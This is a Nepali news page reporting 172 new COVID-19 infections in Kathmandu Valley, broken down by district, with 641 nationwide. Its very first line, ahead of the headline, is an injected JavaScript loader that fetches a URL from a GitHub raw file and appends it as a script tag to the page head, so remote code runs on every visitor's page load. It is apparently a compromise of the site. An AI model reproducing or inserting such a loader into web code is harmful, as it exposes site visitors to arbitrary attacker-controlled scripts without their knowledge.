;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं उपत्यकामा १७२ संक्रमित थपिए – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • काठमाडौं उपत्यकामा १७२ संक्रमित थपिए
जुनेली बिशेष

काठमाडौं उपत्यकामा १७२ संक्रमित थपिए

साउन ३२,

काठमाडौं‌ । पछिल्लो २४ घण्टामा काठमाडौं उपत्यकामा १ सय ७२ जना कोरोना संक्रमित भेटिएका छन् । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार काठमाडौंमा १२६, ललितपुरमा ३८ र भक्तपुरमा ८ जना संक्रमित भेटिएका हुन् ।

संक्रमित कुन ठाउँका हुन् भन्ने मन्त्रालयले खुलाएको छैन । पछिल्लो २४ घण्टामा देशभरमा ६४१ जना संक्रमित थपिएका छन् ।

फेसबुक प्रतिक्रियाहरु